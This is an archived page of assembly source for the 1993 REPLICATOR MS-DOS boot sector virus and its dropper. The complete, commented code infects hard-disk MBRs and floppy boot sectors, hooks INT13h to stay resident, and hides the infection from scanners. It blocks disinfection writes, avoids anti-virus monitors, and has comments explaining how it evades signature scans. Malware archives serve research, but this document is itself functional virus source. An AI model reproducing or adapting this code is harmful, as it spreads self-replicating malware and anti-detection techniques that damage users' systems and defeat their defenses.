MalwareSourceCode/MSDOS/R-Index/Virus.MSDOS.Unknown.replic_d.asm

718 lines
41 KiB
NASM
Raw Normal View History

2022-08-21 09:07:57 +00:00
;**********************************************************************************************
;* *
;* FILE: DROP_REP.ASM (c) 1993 *
;* PURPOSE: Dropper containing REPLICATOR boot sector virus *
;* AUTHOR: Willoughby DATE: 04/19/93 *
;* *
;**********************************************************************************************
;
;------------------------------------------ EQUATES -------------------------------------------
;
AT_TAG EQU 0FC
BAD_TAG EQU 0BAD
BIOS13_OFFSET EQU 004C
BIOS13_SEGMENT EQU 004E
BIOS40_SEGMENT EQU 0103
BPB_NUM_SECT EQU 013
CLEAR EQU 00
INF_TAG1 EQU 0ABCD
INF_TAG2 EQU 0CDEF
MEM_SIZE EQU 0413
MOTOR_ON EQU 043F
PARTITION_OFFSET EQU 01BE
ROM_SEGMENT EQU 0F0
SET EQU 0BB
SYS_ID_OFFSET EQU 0FFFE
SYS_ID_SEGMENT EQU 0F000
;
;---------------------------------------- MAIN PROGRAM ----------------------------------------
;
CODE SEGMENT
;
;----------------------------
;Dropper for REPLICATOR virus
;----------------------------
;
DROPPER:
;
;Check system type to determine if the INT1Ah read-real-time-clock function is supported (AT
;or better). If not, skip the trigger date check/storage process and store "BAD" tag for
;the benefit of the REPLICATOR infection analysis program (a future release).
;
MOV AX,SYS_ID_SEGMENT
MOV DS,AX ;Set DS to ROM segment.
CMP B[SYS_ID_OFFSET],AT_TAG ;Check system ID byte for AT system tag.
PUSH CS
POP DS ;Set DS to dropper code segment.
JE >D1 ;If AT, check date and store before infection.
MOV DROP_MODAY,BAD_TAG ;If not, store hard drive drop date "BAD" tag
;in VIRUS_DIR.
JMP >D3 ;Then continue infection process.
;
;Determine if date is equal to or greater than preselected infection date. This allows the
;dropper program to pass initial anti-viral scanning/activity monitoring by remaining dormant
;until a later date. Also, store month, day and year of pending fixed disk infection in
;VIRUS_DIR.
;
D1:
MOV AH,04 ;Set read-date function.
INT 01A ;BIOS read-clock interrupt.
MOV DROP_YEAR,CX ;Store infection year in VIRUS_DIR.
MOV DROP_MODAY,DX ;Store month and day in VIRUS_DIR.
CMP CX,01993 ;Compare system year with 1993 trigger year
;(CH=century, CL=year, both in BCD).
JA >D2 ;If year>trigger year, proceed w/infection.
JB >D5 ;If year<trigger year, exit and do not infect.
CMP DX,0101 ;Compare system date w/Jan. 1st (DH=month,
;DL=day, both in BCD). The date Jan. 1
;effectively disables this function.
JB >D5 ;If the current date is not => the trigger
;date, don't infect.
;
;Store time of pending fixed disk infection in VIRUS_DIR.
;
D2:
MOV AH,02 ;Select read-time function.
INT 01A ;BIOS read-clock interrupt.
MOV DROP_TIME,CX ;Store infection hour and minute in VIRUS_DIR.
;
;Determine if an anti-viral program is monitoring viral activity via INT40h. If so, don't
;infect.
;
D3:
PUSH DS ;Preserve DS.
XOR AX,AX
MOV DS,AX ;Zero DS to point to BIOS data table.
CMP B[BIOS40_SEGMENT],ROM_SEGMENT ;Has INT40h been stolen from BIOS ROM by an
;anti-virus program?
POP DS ;Restore DS.
JB >D5 ;If INT40h has been stolen, do not attempt
;infection.
;
;Load MBR.
;
PUSH CS
POP ES ;Set ES to dropper code segment.
MOV AX,0201 ;Select read-1-sector function.
MOV BX,MBR_BUFFER ;Set disk I/O buffer offset.
MOV CX,0001 ;Track 0, sector 1.
MOV DX,0080 ;Head 0, fixed disk 1.
INT 013 ;Read MBR.
JB >D5 ;Exit if flag=failure.
;
;Check MBR for infection.
;
CMP W[BX+OFFSET INFECT_TAG1-0200],INF_TAG1 ;Check for VIRUS_BOOT infection tag.
JE >D5 ;If infected then exit.
;
;Check fixed disk for an unused first track (head 0, cylinder 0) to avoid damaging any FAT
;which might be present in that area. This is accomplished by checking the partition table
;value which holds the number of the starting head of the first partition. If this number is
;equal to or greater than 01, the first track is not in use.
;
CMP B[BX+PARTITION_OFFSET+1],01 ;Check for unused track on fixed disk by
;checking partition table data.
JB >D5 ;If in use, exit to avoid damage to FAT.
;
;Increment hard disk infection counter for pending infection.
;
INC W[OFFSET HARD_COUNT]
;
;Write original MBR to its new location. Also, determine if VIRUS_DIR is present on the fixed
;disk. If so, don't write VIRUS_DIR to disk so that the previous infection counts and dates
;are retained.
;
MOV AX,0201 ;Select read-1-sector function.
MOV BX,MBR_BUFFER+0200 ;Set disk I/O buffer offset.
MOV CL,09 ;Track 0, sector 9.
INT 013 ;Read VIRUS_DIR sector.
JB >D5 ;Exit if flag=failure.
CMP W[BX+OFFSET INFECT_TAG2-0400],INF_TAG2 ;Check for VIRUS_DIR infection tag.
MOV AX,0302 ;Select write-2-sectors function.
MOV BX,VIRUS_DIR ;Specify VIRUS_DIR buffer offset.
JNE >D4 ;If VIRUS_DIR is not present, write
;both VIRUS_DIR and MBR.
MOV AX,0301 ;If present, select write-1-sector
;function.
MOV BX,MBR_BUFFER ;Specify MBR buffer address.
MOV CL,0A ;Specify relocation sector for MBR.
D4:
INT 013 ;Write to specified sector(s).
JB >D5 ;Exit if flag=failure.
;
;Copy partition table data to virus.
;
MOV SI,MBR_BUFFER+PARTITION_OFFSET ;Set source offset.
MOV DI,VIRUS_BOOT+PARTITION_OFFSET ;Set destination offset.
MOV CL,021 ;Set repetition count (number of words) for
;partition table move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Move partition table to virus.
;
;Write virus to MBR.
;
MOV AX,0301 ;Select write-1-sector function.
MOV BX,VIRUS_BOOT ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
INT 013 ;Write virus with attached partition table
;to MBR.
;
;Terminate dropper.
;
D5:
MOV AX,04C00 ;Select terminate w/return code function.
INT 021 ;Terminate dropper.
;
DB 86 DUP 00 ;Pad bytes to avoid possible DMA I/O errors.
;
;**********************************************************************************************
;* *
;* REPLICATOR boot sector virus *
;* *
;**********************************************************************************************
;
VIRUS_BOOT:
;
JMP >B1 ;Jump over BPB data to virus entry point.
;
BPB_START:
;
DB 60 DUP 00 ;Reserve space for diskette BPB data.
;
BPB_END:
;
;------------
;Boot routine
;------------
;
;Set location of stack.
;
B1:
XOR AX,AX ;Zero AX.
MOV DS,AX ;Zero DS.
CLI ;Disable interrupts.
MOV SS,AX ;Zero SS.
MOV AX,07C00 ;Load location of stack to AX.
MOV SP,AX ;Set SP=7C00h.
STI ;Enable interrupts.
PUSH DS ;Store return address of boot record to be
PUSH AX ;popped from the stack when VIRUS_BOOT
;returns to it (0000:7C00h).
;
;Read INT13h segment and offset from BIOS data table and store within VIRUS_BOOT.
;
MOV AX,W[BIOS13_OFFSET] ;Load BIOS INT13h vector offset stored at
;0000:004Ch.
MOV W[OFFSET BIOS_OFFSET+07A00],AX ;Store BIOS INT13h offset value in virus data
;area.
MOV CL,06 ;Set CL for virus segment shift. Location of
;this operation chosen to defeat anti-viral
;generic code-segment scans.
MOV AX,W[BIOS13_SEGMENT] ;Load BIOS INT13h vector segment stored at
;0000:004Eh.
MOV W[OFFSET BIOS_SEGMENT+07A00],AX ;Store BIOS INT13h segment value in virus data
;area.
;
;Calculate virus upper memory segment value and store within VIRUS_BOOT.
;
MOV BX,MEM_SIZE ;Load BX with address 0413h. This defeats
;anti-viral searches for 0413h MOV operations.
MOV AX,W[BX] ;Load memory size (in KB) stored at 0000:0413h.
DEC AX ;Calculate value for 2KB reduction of
DEC AX ;conventional memory.
SHL AX,CL ;Calculate virus segment.
MOV W[OFFSET REENTRY_SEGMENT+07A00],AX ;Store virus segment value in virus data area.
MOV ES,AX ;Store in ES to be used to move virus to top of
;conventional memory.
;
;Move VIRUS_BOOT from 0000:7C00h to top of memory - 2KB.
;
MOV SI,07C00 ;Set source offset address for virus move.
XOR DI,DI ;Set destination offset address to 0000h.
MOV CX,0100 ;Set repetition count (number of words) for
;move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Move virus from DS:7C00h to ES:0000h.
CS JMP D[OFFSET REENTRY_OFFSET+07A00] ;Jump to self in new location via stored
;address.
;
;Load VIRUS_DIR and original boot sector/MBR to top of memory - 1.5KB.
;
NEW_LOCATION:
;
PUSH CS
POP DS ;Set DS=CS.
MOV AX,0202 ;Select read-2-sectors function.
MOV BX,0200 ;Set disk I/O buffer offset.
MOV CL,B[OFFSET SECTOR-0200] ;VIRUS_DIR sector determined by value stored in
;VIRUS_BOOT.
CMP CL,09 ;Test for hard drive (HD) boot.
JE >B2 ;Yes, booted from HD.
INC DH ;Select head 1, floppy drive DL.
B2:
INT 013 ;Read VIRUS_DIR and original boot record.
JNB >B3 ;Continue if flag=success.
JMP B5 ;Exit if flag=failure.
;
;Copy original boot sector/MBR down to 0000:7C00h for later execution.
;
B3:
XOR AX,AX ;Zero AX.
MOV ES,AX ;Zero ES (destination segment value).
MOV SI,0400 ;Set source offset address for virus move.
MOV DI,07C00 ;Set destination offset address for move.
MOV CX,0100 ;Set repetition count (# of words) for move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Copy original boot record to 0000:7C00h.
;
;Determine if the virus is already installed on the system in the memory above. If it is, in
;order to prevent multiple installations of the virus in memory and the problems that this can
;cause, the virus will be removed from memory. This will be done by restoring the BIOS data
;table values that it has changed to their original, pre-infection values.
;
CMP W[OFFSET INFECT_TAG1+0600],INF_TAG1 ;Check for presence of virus above us.
JNE >B4 ;If it's not there, exit removal routine.
MOV AX,W[OFFSET BIOS_OFFSET+0600] ;Get the pre-infection INT13h offset value from
;the virus installed in memory.
PUSH AX ;Save that value on the stack.
MOV AX,W[OFFSET BIOS_SEGMENT+0600] ;Get the pre-infection INT13h segment value.
PUSH DS ;Preserve DS.
XOR BX,BX ;Zero BX.
MOV DS,BX ;Zero DS.
MOV W[BIOS13_SEGMENT],AX ;Restore BIOS data table to pre-infection
;segment value.
POP AX ;Pop pre-infection offset value from stack.
MOV W[BIOS13_OFFSET],AX ;Restore BIOS data table to pre-infection
;offset value.
MOV BX,MEM_SIZE ;Move data table address for conventional
;memory size into BX.
ADD W[BX],02 ;Increase memory size value by 2KB to restore
;it to pre-infection value.
POP DS ;Restore DS.
JMP >B5 ;Exit without installing virus in memory.
;
;Test for HD boot and, if true, install virus in memory.
;
B4:
CMP DL,080 ;Booted from HD?
JE >B6 ;If so, install virus and exit.
;
;Must be booting from floppy, so load MBR to top of memory - 1KB.
;
PUSH CS
POP ES ;Set ES=CS.
MOV AX,0201 ;Select read-1-sector function.
MOV BX,0400 ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
MOV DX,0080 ;Head 0, HD 1.
INT 013 ;Read MBR.
JB >B5 ;Exit if flag=failure and do not steal INT13h.
;
;Check MBR for infection.
;
CMP W[BX+OFFSET INFECT_TAG1-0200],INF_TAG1 ;Check MBR for infection tag.
JE >B5 ;If infected, exit and do not steal INT13h.
;
;Check fixed disk for an unused first track (head 0, cylinder 0) to avoid damaging any FAT
;which might be present in that area.
;
CMP B[BX+PARTITION_OFFSET+1],01 ;Check for unused track on HD by checking
;partition table data (start head => 1).
JB >B5 ;If first track is in use, exit to avoid
;FAT damage and do not steal INT13h vector.
;
;Increment hard disk infection counter for pending infection.
;
INC W[OFFSET HARD_COUNT-0200]
;
;Write VIRUS_DIR and original MBR to fixed disk sectors 09h and 0Ah respectively.
;
MOV AX,0302 ;Select write-2-sectors function.
MOV BX,0200 ;Set disk I/O buffer offset.
MOV CL,09 ;Track 0, sector 9.
MOV B[OFFSET SECTOR-0200],CL ;Store destination sector number in VIRUS_BOOT.
INT 013 ;Move VIRUS_DIR to sector 09h and original MBR
;to sector 0Ah.
JB >B5 ;Exit if flag=failure and do not steal INT13h.
;
;Copy partition table data to VIRUS_BOOT.
;
MOV SI,PARTITION_OFFSET+0400 ;Set source offset.
MOV DI,PARTITION_OFFSET ;Set destination offset.
MOV CL,021 ;Set repetition count (# of words) move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Move partition table to virus.
;
;Write VIRUS_BOOT to MBR and exit without installing virus in memory. Subsequent HD boot will
;do this.
;
MOV AX,0301 ;Select write-1-sector function.
XOR BX,BX ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
INT 013 ;Write virus w/attached partition table to MBR.
B5:
XOR DX,DX ;Restore DX back to value at floppy boot
;(head 0, drive 0).
RETF ;Exit, do not steal INT13h or reduce mem. size.
;Return to boot sector code at 0000:7C00h.
;
;Steal BIOS INT13h vector and reduce memory size to install virus as TSR.
;
B6:
MOV BX,W[OFFSET REENTRY_SEGMENT-0200] ;Load VIRUS_DIR segment value to BX.
XOR AX,AX ;Zero AX.
MOV DS,AX ;Zero DS.
MOV W[BIOS13_SEGMENT],BX ;Point INT13h vector to VIRUS_DIR
;segment.
MOV W[BIOS13_OFFSET],OFFSET VIRUS_INT-0200 ;Point INT13h vector to VIRUS_INT
;INT13h handler offset in VIRUS_DIR.
MOV BX,MEM_SIZE ;Load BIOS data table address for
;memory size to BX.
SUB W[BX],02 ;Reduce memory by 2KB to protect virus
;area from being overwritten by other
;programs.
RETF ;Return to boot sector code at
;0000:7C00h.
;
;Reserve storage locations for virus data and preset some known values.
;
BIOS_OFFSET DW ? ;BIOS INT13 offset.
BIOS_SEGMENT DW ? ;BIOS INT13 segment.
REENTRY_OFFSET DW NEW_LOCATION-0200 ;Virus reentry offset.
REENTRY_SEGMENT DW ? ;Virus reentry segment.
INFECT_TAG1 DW INF_TAG1 ;Infection tag for VIRUS_BOOT.
SECTOR DB 09 ;Sector # containing VIRUS_DIR.
;
VIRUS_BOOT_END:
;
;Reserve end-of-sector text area and establish valid boot record tag.
;
DB 195 DUP 00 ;End-of-sector pad bytes.
DB 055,0AA ;Boot record tag.
;
SECTOR_END:
;
;End of boot sector/MBR viral code.
;----------------------------------------------------------------------------------------------
;Start of directory sector viral code.
;
VIRUS_DIR:
;
;Create four empty root directory entries at the beginning of the sector.
;
DB 128 DUP 00
;
;--------------
;INT13h Handler
;--------------
;
VIRUS_INT:
;
CMP DL,080 ;Hard drive I/O?
JNE >F1 ;No, exit to floppy test routine.
;
;Stealth routine to return original, uninfected MBR to any anti-viral scan program. Also,
;prevents writes to the MBR to prevent disinfection of the fixed disk while the virus is
;active in memory.
;
CMP CX,0001 ;Track 0, sector 1?
JNE >U1 ;If not, no need for the stealth routine.
;Instead, jump to infect. count. update.
CMP DH,00 ;Head 0?
JNE >E2 ;If not, exit stealth routine.
CMP AH,03 ;Write sector?
JE >S1 ;Yes, simulate I/O.
PUSH CX ;Preserve CX (track/sector #).
MOV CL,0A ;Redirect I/O to sector 0Ah, the new location
;of the original MBR.
PUSHF
CS CALL D[OFFSET BIOS_OFFSET-0200] ;Send scan program original MBR
;instead of infected MBR.
POP CX ;Restore original track/sector value requested
;the calling routine. Anti-viral scanner will
;monitor the contents of CL upon return.
S1:
XOR AH,AH ;Zero AH to simulate return value of
;successful I/O.
CLC ;Clear carry flag to simulate successful I/O
;to calling routine.
RETF 2 ;Return to calling routine.
;
;Infection counter update routine writes VIRUS_DIR containing the lastest floppy infection
;counter value to the hard drive only if there has been a diskette infection since the last
;hard drive access.
;
U1:
PUSH DS ;Preserve DS.
PUSH CS
POP DS ;Set DS=CS
CMP B[OFFSET UPDATE_FLAG-0200],SET ;Floppy infected since last HD access?
JNE >U2 ;No, exit counter update routine.
MOV B[OFFSET UPDATE_FLAG-0200],CLEAR ;Yes, clear floppy infect flag.
PUSH ES ;Preserve ES.
PUSH CS
POP ES ;Set ES=CS
PUSH AX ;Preserve registers.
PUSH BX
PUSH CX
PUSH DX
MOV AX,0301 ;Select write-1-sector function.
MOV BX,0200 ;Set disk I/O buffer start address.
MOV CX,0009 ;Specify track 0, sector 9.
MOV DH,00 ;Specify head 0.
PUSHF
CS CALL D[OFFSET BIOS_OFFSET-0200] ;Save VIRUS_DIR w/new infect. count to HD.
POP DX ;Restore registers
POP CX
POP BX
POP AX
POP ES
U2:
POP DS
JMP >E2 ;Exit to handler exit.
;
;Check the INT13h register values for drive A or B read or write request. This prevents
;problems caused by the virus infecting a diskette during format. Also, by limiting infection
;attempts to the first two floppy drives, it avoids the problems it would cause to a tape
;backup system emulating a third or fourth floppy drive.
;
F1:
PUSH DS ;Preserve DS.
PUSH AX ;Preserve AX.
CMP DL,01 ;Floppy I/O (A or B)?
JA >E1 ;No, don't infect.
CMP AH,02 ;Check for read function.
JB >E1 ;Exit if below read function.
CMP AH,03 ;Check for write function.
JA >E1 ;Exit if above write function.
;
;Check diskette motor status to limit infection attempt to first INT13h call thereby preventing
;suspicious floppy drive noises.
;
XOR AX,AX ;Zero AX.
MOV DS,AX ;Zero DS.
MOV AL,DL ;Move motor-on test bit into AL.
INC AL ;Position bit for floppy 'DL'.
TEST B[MOTOR_ON],AL ;Test for floppy motor on.
JNE >E1 ;Yes, don't infect.
;
;Check for presence of TSR anti-viral monitoring program to avoid detection of boot sector
;write by virus. If present, don't attempt infection.
;
CMP B[BIOS40_SEGMENT],ROM_SEGMENT ;Has INT40h been stolen from BIOS ROM by an
;anti-virus program?
JB >E1 ;If so, do not attempt infection.
;
;Infect floppy.
;
POP AX ;Restore AX.
POP DS ;Restore DS.
PUSHF
CS CALL D[OFFSET BIOS_OFFSET-0200] ;Give calling routine what it wants.
PUSHF ;Preserve flags.
CALL >F2 ;Then attempt infection.
POPF ;Restore flags to hide I/O errors.
RETF 2 ;Return to calling routine.
;
;Jump to BIOS.
;
E1:
POP AX ;Restore AX.
POP DS ;Restore DS.
E2:
CS JMP D[OFFSET BIOS_OFFSET-0200] ;Jump through BIOS to calling routine.
;
;Diskette infection routine.
;
F2:
PUSH AX ;Preserve all registers.
PUSH BX
PUSH CX
PUSH DX
PUSH DS
PUSH ES
PUSH SI
PUSH DI
;
;Check system type to determine if the INT1Ah read-real-time-clock function is supported (AT
;or better). If not, skip the date check/storage process and store floppy infection "BAD"
;date tag in VIRUS_DIR.
;
MOV AX,SYS_ID_SEGMENT
MOV DS,AX ;Set DS to ROM offset.
CMP B[SYS_ID_OFFSET],AT_TAG ;Check system ID byte for AT system tag.
PUSH CS
POP DS ;Set DS to point to dropper segment.
JE >F3 ;If AT, check date and store before infection.
MOV W[OFFSET FLOPPY_MODAY-0200],BAD_TAG ;Store date "BAD" tag in VIRUS_DIR.
JMP >F4 ;Then continue infection process.
;
;Store month, day and year of pending floppy diskette infection in VIRUS_DIR.
;
F3:
PUSH DX
MOV AH,04 ;Set read-date function.
INT 01A ;BIOS read-clock interrupt.
MOV W[OFFSET FLOPPY_YEAR-0200],CX ;Store infection year in VIRUS_DIR.
MOV W[OFFSET FLOPPY_MODAY-0200],DX ;Store month and day in VIRUS_DIR.
;
;Store time of pending floppy diskette infection in VIRUS_DIR.
;
MOV AH,02 ;Select read-time function.
INT 01A ;BIOS read-clock interrupt.
MOV W[OFFSET FLOPPY_TIME-0200],CX ;Store infection hour and minute in VIRUS_DIR.
POP DX
;
;Load diskette boot sector to top of memory - 1KB.
;
F4:
PUSH CS
POP ES ;Set ES=CS.
MOV AX,0201 ;Select read-1-sector function.
MOV BX,0400 ;Set disk I/O buffer offset.
MOV CX,0001 ;Track 0, sector 1.
MOV DH,00 ;Head 0, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Read drive DL boot sector to buffer by
;calling INT13h routine in BIOS ROM.
JNB >F5 ;Proceed with infection if flag=success.
JMP F7 ;Otherwise, exit.
;
;Check diskette boot sector for infection.
;
F5:
CMP W[BX+OFFSET INFECT_TAG1-0200],INF_TAG1 ;Check for VIRUS_BOOT infection tag.
JE >F7 ;If infected, then exit.
;
;Determine diskette type from BPB data to allow VIRUS_DIR and original boot sector to be
;written to the last two root directory sectors. This maximizes the number of files that can
;be stored on the diskette after infection. Also, detect non-standard formats and do not
;infect to prevent damage.
;
MOV CL,02 ;VIRUS_DIR sector for 360K.
MOV AX,W[BX+BPB_NUM_SECT] ;Load # sect. on floppy from BPB.
CMP AX,02D0 ;Check for # sectors on 360K.
JE >F6 ;Exit if 360K floppy.
MOV CL,04 ;VIRUS_DIR sector for 720K.
CMP AX,05A0 ;Check for # sectors on 720K.
JE >F6 ;Exit if 720K floppy.
MOV CL,0D ;VIRUS_DIR sector for 1.2M.
CMP AX,0960 ;Check for # sectors on 1.2M.
JE >F6 ;Exit if 1.2M floppy.
MOV CL,0E ;VIRUS_DIR sector for 1.44M.
CMP AX,0B40 ;Check for # sectors on 1.44M.
JE >F6 ;Exit if 1.44M floppy.
JMP >F7 ;Non-standard disk format, exit to avoid
;damage.
;
;Load the first of the two root directory sectors that will be used to store the VIRUS_DIR
;and original boot sector to top of memory - 0.5KB.
;
F6:
MOV B[OFFSET SECTOR-0200],CL ;Store destination sector # in VIRUS_BOOT.
MOV AX,0201 ;Select read sector function.
MOV BX,0600 ;Set disk I/O buffer offset.
INC DH ;Head 1, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Load destination sector.
JB >F7 ;Exit if flag=failure.
;
;Confirm that the directory sector chosen to be the future location of VIRUS_DIR is empty
;before attempting infection. This prevents the loss of files which would result from
;the overwriting of root directory entries by the virus.
;
CMP B[BX],00 ;Empty root directory entry?
JNE >F7 ;No, so exit and don't infect disk.
;
;Copy the original boot sector's BPB to VIRUS_BOOT to allow functional infection of any
;diskette type.
;
MOV SI,BPB_START+0200 ;Set source offset.
MOV DI,BPB_START-0200 ;Set destination offset.
MOV CL,BPB_END-BPB_START ;Set repetition count (# of bytes) for move.
CLD ;Clear direction flag (fwd).
REP MOVSB ;Move BPB to virus to allow functional
;infection of any diskette format.
;
;Copy original boot sector end-of-sector text to VIRUS_BOOT to prevent easily visible changes
;to boot sector.
;
MOV SI,VIRUS_BOOT_END+0200 ;Set source offset.
MOV DI,VIRUS_BOOT_END-0200 ;Set destination offset.
MOV CL,SECTOR_END-VIRUS_BOOT_END ;Set repetition count (number of bytes) for
;text move.
CLD ;Clear direction flag (fwd).
REP MOVSB ;Move end-of-sector text to virus to prevent
;easily visible change to boot sector.
;
;Write VIRUS_BOOT to diskette boot sector.
;
MOV AX,0301 ;Select write-1-sector function.
XOR BX,BX ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
DEC DH ;Head 0, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Write infected boot sector.
JB >F7 ;Exit if flag=failure.
;
;Increment floppy infection count.
;
INC W[OFFSET FLOPPY_COUNT-0200]
;
;Clear diskette infection flag.
;
MOV B[OFFSET UPDATE_FLAG-0200],CLEAR
;
;Write VIRUS_DIR and original boot sector to appropriate sectors.
;
MOV AX,0302 ;Select write-2-sectors function.
MOV BX,0200 ;Set disk I/O buffer offset.
MOV CL,B[OFFSET SECTOR-0200] ;Track 0, sector stored at 0189h.
INC DH ;Head 1, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Relocate boot sector.
;
;Set diskette infection flag.
;
MOV B[OFFSET UPDATE_FLAG-0200],SET
;
;Exit diskette infection routine.
;
F7:
POP DI ;Restore all registers.
POP SI
POP ES
POP DS
POP DX
POP CX
POP BX
POP AX
RET ;Return to infection routine exit.
;
;Virus data area.
;
HARD_COUNT DW ? ;Number of HD infections since drop.
DROP_MODAY DW ? ;Month and day of HD drop.
DROP_YEAR DW ? ;Year of HD drop.
DROP_TIME DW ? ;Time of HD drop.
FLOPPY_COUNT DW ? ;Number of floppy infections since drop.
FLOPPY_MODAY DW ? ;Month and day of last floppy infection.
FLOPPY_YEAR DW ? ;Year of last floppy infection.
FLOPPY_TIME DW ? ;Time of last floppy infection.
INFECT_TAG2 DW INF_TAG2 ;Infection tag for VIRUS_DIR.
UPDATE_FLAG DB CLEAR ;Flag indicating floppy infection since last
;HD access.
;
DB 3 DUP 00 ;End-of-sector pad bytes.
;
;End of directory sector viral code.
;----------------------------------------------------------------------------------------------
;Start of MBR disk buffer.
;
MBR_BUFFER:
;
;----------------------------------------------------------------------------------------------
;
CODE ENDS